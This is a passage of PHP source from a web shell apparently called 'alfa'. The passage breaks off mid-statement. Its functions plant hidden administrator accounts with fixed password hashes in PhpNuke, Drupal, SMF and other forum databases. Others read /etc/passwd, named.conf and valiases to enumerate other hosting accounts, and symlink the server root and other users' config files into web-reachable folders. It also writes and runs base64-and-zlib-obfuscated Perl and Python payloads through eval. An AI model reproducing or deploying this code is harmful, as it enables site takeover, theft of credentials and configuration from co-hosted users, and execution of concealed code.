\'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'toftof\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true),\r\n \'td8\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Email\', \'inputName\' => \'email\', \'inputValue\' => \'solevisible@fbi.gov\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form></center>\';\r\nif ($_POST[\'alfa1\'] && $_POST[\'alfa1\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa2\'];\r\n$database = $_POST[\'alfa3\'];\r\n$username = $_POST[\'alfa4\'];\r\n$password = $_POST[\'alfa5\'];\r\n$admin = $_POST[\'alfa8\'];\r\n$SQL = $_POST[\'alfa9\'];\r\n$prefix = $_POST[\'alfa10\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,\'".$admin."\',\'e71f2c3265619038d826a1ac6e2b9b8e\',\'ywza68lS\',\'".$SQL."\',\'4\')") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');}\r\n}\r\n}\r\nif(isset($_POST[\'alfa8\']) && $_POST[\'alfa8\'] == \'nuke\'){\r\n\r\necho __pre().\'<center><div class="txtfont_header">| PhpNuke |</div><p><p>\'.getConfigHtml(\'phpnuke\').\'</p><form onsubmit="g(\\\'pwchanger\\\',null,\\\'>>\\\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\\\'nuke\\\',this.email.value,this.prefix.value); return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'id\'=>\'db_host\',\'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix\', \'id\'=>\'db_prefix\',\'inputName\' => \'prefix\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'toftof\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true),\r\n \'td8\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Email\', \'inputName\' => \'email\', \'inputValue\' => \'solevisible@fbi.gov\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form></center>\';\r\nif ($_POST[\'alfa1\'] && $_POST[\'alfa1\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa2\'];\r\n$database = $_POST[\'alfa3\'];\r\n$username = $_POST[\'alfa4\'];\r\n$password = $_POST[\'alfa5\'];\r\n$admin = $_POST[\'alfa7\'];\r\n$SQL = $_POST[\'alfa9\'];\r\n$prefix = $_POST[\'alfa10\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\r\n$hash = md5($pwd);\r\n$solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values(\'$admin\',\'God\',\'$SQL\',\'d4a590caacc0be55ef286e40a945ea45\')") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');}\r\n}\r\n}\r\nif(isset($_POST[\'alfa9\']) && $_POST[\'alfa9\'] == \'drupal\'){\r\n\r\necho __pre().\'<center><div class="txtfont_header">| Drupal |</div><p><p>\'.getConfigHtml(\'drupal\').\'</p><form onSubmit="g(\\\'pwchanger\\\',null,\\\'>>\\\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\\\'drupal\\\'); return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'id\'=>\'db_host\',\'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'toftof\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true)\r\n );\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form></center>\';\r\nif ($_POST[\'alfa1\'] && $_POST[\'alfa1\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa2\'];\r\n$database = $_POST[\'alfa4\'];\r\n$username = $_POST[\'alfa5\'];\r\n$password = $_POST[\'alfa6\'];\r\n$admin = $_POST[\'alfa8\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\r\n$getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");\r\n$getDescuid = @mysqli_fetch_assoc($getDescuid);\r\n$getDescuid = $getDescuid[\'uid\'];\r\n$getdescuid = $getDescuid++;\r\n$solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values(\'$getDescuid\',\'$admin\',\'\\$S\\$DP2y9AbolCBOd\\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC\',\'solevisible@fbi.gov\',\'filtered_html\',\'1\',\'Europe/Berlin\',\'solevisible@fbi.gov\')") or die(mysqli_error($conn));\r\n$solevisible=@mysqli_query($conn,"select uid from users where name=\'".$admin."\'") or die(mysqli_error($conn));\r\n$sole = mysqli_num_rows($solevisible);\r\nif ($sole == 1){\r\n$solevis = mysqli_fetch_assoc($solevisible);\r\n$res = $solevis[\'uid\'];\r\n}\r\n$solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES (\'".$res."\', \'3\')") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');}\r\n}\r\n}\r\n\r\nif(isset($_POST[\'alfa10\']) && $_POST[\'alfa10\'] == \'smf\'){\r\n\r\necho __pre().\'<center><center><div class="txtfont_header">| SMF |</div><p><p>\'.getConfigHtml(\'smf\').\'</p><form onSubmit="g(\\\'pwchanger\\\',null,\\\'>>\\\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\\\'smf\\\'); return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'id\'=>\'db_host\',\'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix\', \'id\'=>\'db_prefix\',\'inputName\' => \'prefix\', \'inputValue\' => \'smf_\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'hi\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true),\r\n );\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form></center>\';\r\nif ($_POST[\'alfa1\'] && $_POST[\'alfa1\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa2\'];\r\n$database = $_POST[\'alfa3\'];\r\n$username = $_POST[\'alfa5\'];\r\n$password = $_POST[\'alfa6\'];\r\n$prefix = $_POST[\'alfa7\'];\r\n$admin = $_POST[\'alfa8\'];\r\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\r\n$setpwAlg = sha1(strtolower($admin) . \'solevisible\');\r\n$solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,\'$admin\',\'1\',\'$admin\',\'$setpwAlg\',\'solevisible@fbi.gov\')") or die(mysqli_error($conn));\r\nif($solevisible){\r\n__alert(\'Success... \'.$admin.\' is created...\');}\r\n}\r\n}\r\necho "</div>";\r\nalfafooter();\r\n}\r\nfunction alfaMakePwd(){\r\n\tif(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){\r\n\t\treturn "/home/{user}/public_html/";\r\n\t}\r\n\t$document = explode("/", $_SERVER["DOCUMENT_ROOT"]);\r\n\t$public = end($document);\r\n\tarray_pop($document);\r\n\tarray_pop($document);\r\n\t$path = implode("/", $document) . "/{user}/" . $public;\r\n\treturn $path;\r\n}\r\nfunction alfaGetDomains($state = false){\r\n\t$state = "named.conf";\r\n\t$lines = array();\r\n\t$lines = _alfa_file(\'/etc/named.conf\');\r\n\tif(!$lines){\r\n\t\t$lines = @scandir("/etc/valiases/");\r\n\t\t$state = "valiases";\r\n\t\tif(!$lines){\r\n\t\t\t$lines = @scandir("/var/named");\r\n\t\t\t$state = "named";\r\n\t\t\tif(!$lines && $state){\r\n\t\t\t\t$lines = _alfa_file(\'/etc/passwd\');\r\n\t\t\t\t$state = "passwd";\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn array("lines" => $lines, "state" => $state);\r\n}\r\nfunction alfaCreateParentFolder(){\r\n\t$parent = $GLOBALS[\'home_cwd\'] . "/" . __ALFA_DATA_FOLDER__;\r\n\tif(!@is_dir($parent)){\r\n\t\t@mkdir($parent, 0755, true);\r\n\t}\r\n}\r\nfunction alfasymlink(){\r\nalfahead();\r\nAlfaNum(9,10);\r\nalfaCreateParentFolder();\r\n@chdir($GLOBALS[\'home_cwd\'] . "/" . __ALFA_DATA_FOLDER__);\r\necho \'<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\\\'symlink\\\',null,null,\\\'symphp\\\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\\\'symlink\\\',null,null,\\\'symperl\\\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\\\'symlink\\\',null,null,\\\'sympy\\\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\\\'symlink\\\',null,null,null,null,\\\'SymFile\\\')">| File Symlink | </a></h3></center>\';\r\nif(isset($_POST[\'alfa2\'])&&($_POST[\'alfa2\']==\'symperl\'||$_POST["alfa2"]=="sympy")){\r\n\t$sympath = alfaMakePwd();\r\n\t@mkdir(\'cgialfa\',0755);\r\n\t@chdir(\'cgialfa\');\r\n\talfacgihtaccess(\'cgi\');\r\n\t$perl = \'#!/usr/bin/perl   -I/usr/local/bandmin\'."\\n".\'use MIME::Base64;use Compress::Zlib;my $alfa_data="\'.__ALFA_DATA_FOLDER__.\'";eval(Compress::Zlib::memGunzip(decode_base64("H4sIAAAAAAAA/50Ye1PTSPyrLLFnEqV5VBBs2gKH4jmjciPoP5TrbLLbNpImuez2Zamf/X77SBqgoHOZId3N/t7vZcooirKUcZxy9OFicPr+A+r20A5dxIwz1Dj58v7blXcdTJaoMWv5qIsMQ21CtY6HyFJ4NlrlRQxkjNMs5TTlTb7MaRtxuuDumE+SftpPO2LR64wpJr0Oj3lCe6cZoQSFS3Ty8ewEXdKTTx1XnXQYX8IPXgkSTUKjrMA8ztJ2mqU0WHdcdd5xFbkwI0sUjqIsyYqu+cyTj9kzAiWW2SHxDEmUrpFjQuJ01Pa9fBEEE1yM4rQZZpxnE/UtzApCi7afLxDBbAwSPhvKJ5D027AT5AMpGk7iUdqOQGdaBEPQvjmn8WjM22GWEPWBxT9ou/UaKBsbjVmWUMQwQc9RnM5iFoew/4kulpMkTm/Qn0v0Ny2SjguC98xgTRNGV9oNlWeUJxo4GeIBwRw7hhuNYrF1jWDNpiGQHuCiwEu0AsdZgO/tNma+ZwPa8UA484+ZP4TNBOdo1RgI//trdCwAg4LyaZEiS8UDIPvDlUBe2/aR3/YUg3xOStqvNdV4aO3osFhpGkLwYA0HAIXov8ggcUEjblQAhjvOJtRdTRkt1m4+DZM4Goh4EYoAXpMCCOWRm+IJJQ6E7dBAz5+jJtHfZ+AHzChzf5PmMcuTmIPA8tdy+667ixrvPn9bGW/PT79+evf5cvDl/PzSWNsq5g8ANs9ypBCD2lKz+57FqWW4xq7+bjsggWZuIAcoKItN8A3lRWm0PeA6o+LlH4r3vjaiTqcOQKqwNR9GmwlpBLEvYgyVkX8Gj+dD5APDPcfouOIU0kQAcrKFVkKHXFDCaFzQYdc0HJCKSiddHYnn2kBHyPyOZ5hFRZzzNk5owS1jDtVDVI5hnBJEsgmOU8dxDNtsI3PMed52XROEoLZjmIhDllHeNQdhgtMb857QnnfSanlKaFoTGleCb9Hy7Ewh+IcP1KxrAzniGCIlmMosV6xzSC2HL7g43oes+ZWAYFNZT3R2PhDQ5UVPZxzJBsDpfk7IEPJfiRiaE/ldfDqe+fvwydKbqLZ+Va0bMwJrX5OApaeWbzZLb7P0FUQt1WTGQFaoY8FDfwqynEJ6E0+4ju0i816CmTbKigqnTDAj0FJ3NGIviJIMWoneKtaAI3hXSCV7IbR5N2FNKQcUBKQaTWtXASreB1J3zbKgonQXEurOueJ5cJfLDBdKm6c5+L/g4JccdsTGXiknQDmDB6rytqK21bCzuOBTnLgqVbJ5SgtWmfiOEE9b1tdaHtacXjOr5vKkzoeaW7RV48ONSQ9LXaQdHw8RImVRBDvyuJRdbqr25WnL6e0bva0Uq+JXcLVyzNi84qp2j1hMHfYC4QoIVrU1gg1lXU91EUDviiIrRLnSolXlFos2rAaArumbZcEMcXQzKrJpSpp6BlAjhh4f2h7CU57Jiqznm/9Zt188KGVbK+VbGUTsaeCySn6FHvRL0O0Frixu8NJ6iUkLal1jIe0/zCB+orEMMkCkyBIesVcRtN5cB6ecUcSh3uPaJOmTcpR8UK90xkFQSMLdn2jiOi+OfsD8hwwLVraBVm5QMvC1J606R1ugMdchoeuOqkALJR9gkYJr7owlije6vUXll1oFqyM7GqjcOhU1pZaMwnuDiehVYaCGGQEiw10YAxpPPp/GxLJgFueWPLOv9q5trZIirNaqa9DN4NIWc4vUNdDk4Ieq6VAZQmz9a2XiN5Kp2CvL/NNnL2/hryHsU8f3Jb6gsx0wrDGqW1BnXmktetW6Rh2073mlfTRuNVyodndQm8TWahaDdilVIiWn/Wvo1MKKB0K60pl4qzNFjFSiWBsqr3RE6LlM4IvAkFhEDJT39FBe9srGsieLUz3ooeRByEd3Ir5VC3Bci2+irRI9FszCOS0VzJZCbfha4L5z22/WgtirYGdRBQxy3IeWwC0Alg1nkEAx7yJ4j/hYWs9GTTVbVCMHYMAcw3ghz3eRB76okG1hnOr4walUsLxzWH2gKR2JHdCjShA5/1qNhThSbQnLNwF3L16+DLSd/SCfsrFVowF6iK6rC8MeOGVDqoqnLQR16jwmGgTkduH8cAuxB0IBNnAoG4irCiT8ik4ihsL15Ab6q1WfQUFI72B/X493voyXZ+pmCPe+C3EzvJA3ww/lzbCfnufi+svgE6ELytBZliTZHOr1RyDI+ulbOXxkxVICyOulxnVyuPT00xNCLuFSru7keQLtA+XjXPztIQGRIHghdVkH2L9wSmDQ/w1wHelDNU/CArzRAxXvTN3OmOMoooyVV3II3+Faaq8nBUFBQ6tr1ONTuwzSnepOuG2ygrRXk7hVNhRdTMuv5bAmU6S8rlZe1E6U/7EAH/4H5eHKfSsRAAA=")));\';\r\n\t$py = \'#!/usr/bin/python\'."\\nimport zlib, base64\\nalfa_data=\'".__ALFA_DATA_FOLDER__."\'\\n".\'eval(compile(zlib.decompress(base64.b64decode("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")),\\\'<string>\\\',\\\'exec\\\'))\';\r\n\t$cginame = "symperl.alfa";\r\n\t$source = $perl;\r\n\t$lang = "perl";\r\n\tif($_POST["alfa2"]=="sympy"){\r\n\t\t$cginame = "pysymlink.alfa";\r\n\t\t$source = $py;\r\n\t\t$lang = "python";\r\n\t}\r\n\t@__write_file($cginame,$source);\r\n\t@chmod($cginame,0755);\r\n\techo __pre();\r\n\t$resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);\r\n\tif(strlen($resource) == 0){\r\n\t\techo AlfaiFrameCreator(\'cgialfa/\'.$cginame);\r\n\t}else{\r\n\t\techo $resource;\r\n\t}\r\n}\r\nif(isset($_POST[\'alfa4\']) && $_POST[\'alfa4\']==\'SymFile\'){\r\nif(function_exists(\'symlink\')||_alfa_can_runCommand(true,true)){\r\nAlfaNum(9,10);\r\necho __pre().\'\r\n<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\\\'symlink\\\',null,null,null,null,\\\'SymFile\\\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">\r\n<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />\r\n<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>\r\n<p><input type="submit" value=" " name="symlink" /></p></form></center>\';\r\n$path = $_POST[\'alfa5\'];\r\n$symname = $_POST[\'alfa6\'];\r\n$solevisible58 = $_POST[\'alfa7\'];\r\nif($solevisible58){\r\n$new_name = str_replace(".", "_", basename($symname));\r\n$rand_dir = $new_name.rand(111,9999);\r\n$sym_dir = \'alfasymlinkphp/\'.$rand_dir.\'/\';\r\n@mkdir($sym_dir, 0777, true);\r\nalfacgihtaccess(\'sym\', $sym_dir, $symname);\r\n_alfa_symlink("$path","$sym_dir/$symname");\r\necho __pre();\r\necho \'<center><b><font color="white">Click >> </font><a target="_blank" href="\'.__ALFA_DATA_FOLDER__."/".$sym_dir.\'" ><b><font size="4">\'.$symname.\'</font></b></a></b></center>\';\r\n}\r\n}else{echo "<center><pre class=ml1 style=\'margin-top:5px\'><b><font color=\\"#FFFFFF\\">[+] Symlink Function Disabled !</b></font></pre></center>";}\r\n}\r\nif(isset($_POST[\'alfa2\']) && $_POST[\'alfa2\']==\'symphp\'){\r\n$cant_symlink = true;\r\nif(function_exists(\'symlink\')||_alfa_can_runCommand(false,false)){\r\n@mkdir(\'alfasymlink\',0777);\r\nalfacgihtaccess(\'sym\',\'alfasymlink/\');\r\n_alfa_symlink(\'/\',\'alfasymlink/root\');\r\n$table_header = "<pre id=\\"strOutput\\" style=\\"margin-top:5px\\" class=\\"ml1\\"><br><table id=\'tbl_sympphp\' align=\'center\' width=\'40%\' class=\'main\' border=\'1\'><td><span style=\'color:#FFFF01;\'><b>*</span></b></td><td><span style=\'color:#00A220;\'><b>Domains</span></b></td><td><span style=\'color:#FFFFFF;\'><b>Users</span></b></td><td><span style=\'color:#FF0000;\'><b>symlink</span></b></td>";\r\nif(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){\r\necho "<center>";\r\n$lines = array();\r\n$anony_domains = array();\r\n$anonymous_users = array();\r\n$f_black = array();\r\n$error = false;\r\n$anonymous = false;\r\n$makepwd = "/home/{user}/public_html/";\r\n$domains = alfaGetDomains();\r\n$lines = $domains["lines"];\r\n$state = $domains["state"];\r\n$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");\r\n$can_runcmd = _alfa_can_runCommand(false,false);\r\nif(!$is_posix && !$can_runcmd){\r\n\t$anonymous = true;\r\n\t$anony_domains = $domains["lines"];\r\n\t$lines = _alfa_file(\'/etc/passwd\');\r\n}\r\necho $table_header;\r\n$count=1;\r\n$template = \'<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="\'.__ALFA_DATA_FOLDER__.\'/alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>\';\r\nforeach($lines as $line){\r\n\t$domain = "";\r\n\t$owner = "";\r\n\tif($anonymous){\r\n\t\t$explode = explode(":", $line);\r\n\t\t$owner = $explode[0];\r\n\t\t$owner_len = strlen($owner) - 1;\r\n\t\t$userid = $explode[2];\r\n\t\tif((int)$userid < 500)continue;\r\n\t\t$domain = "[?????]";\r\n\t\t$temp_black = array();\r\n\t\t$finded = false;\r\n\t\tforeach($anony_domains as $anony){\r\n\t\t\tif($state == "named.conf"){\r\n\t\t\t\tif(@strstr($anony, \'zone\')){\r\n\t\t\t\t\tpreg_match_all(\'#zone "(.*)"#\',$anony, $data);\r\n\t\t\t\t\t$domain = $data[1][0];\r\n\t\t\t\t}else{\r\n\t\t\t\t\tcontinue;\r\n\t\t\t\t}\r\n\t\t\t}elseif($state == "named" || $state == "valiases"){\r\n\t\t\t\tif($anony == "." || $anony == "..")continue;\r\n\t\t\t\tif($state == "named")$anony = rtrim($anony, ".db");\r\n\t\t\t\t$domain = $anony;\r\n\t\t\t}\r\n\t\t\t$sub_domain = str_replace(array("-","."), "", $domain);\r\n\t\t\tif(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){\r\n\t\t\t\tif(in_array($owner.$domain, $temp_black))continue;\r\n\t\t\t\t$sympath = str_replace("{user}", $owner, $makepwd);\r\n\t\t\t\t$http = "http://".$domain;\r\n\t\t\t\techo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);\r\n\t\t\t\t$count++;\r\n\t\t\t\t$temp_black[] = $owner.$domain;\r\n\t\t\t\t$finded = true;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif(!$finded){\r\n\t\t\t$anonymous_users[] = $owner;\r\n\t\t}\r\n\t}else{\r\n \t\tif($state == "named.conf"){\r\n\t\t\tif(@strstr($line, \'zone\')){\r\n\t\t\t\tpreg_match_all(\'#zone "(.*)"#\',$line, $data);\r\n\t\t\t\t$domain = $data[1][0];\r\n\t\t\t}else{\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\t\t}elseif($state == "named" || $state == "valiases"){\r\n\t\t\tif($line == "." || $line == "..")continue;\r\n\t\t\tif($state == "named")$line = rtrim($line, ".db");\r\n\t\t\t$domain = $line;\r\n\t\t}\r\n\t\tif(strlen(trim($domain)) > 2 && $state != "passwd"){\r\n\t\t\tif(!_alfa_file_exists(\'/etc/valiases/\'.$domain, false))continue;\r\n\t\t\tif($is_posix){\r\n\t\t\t\t$user = 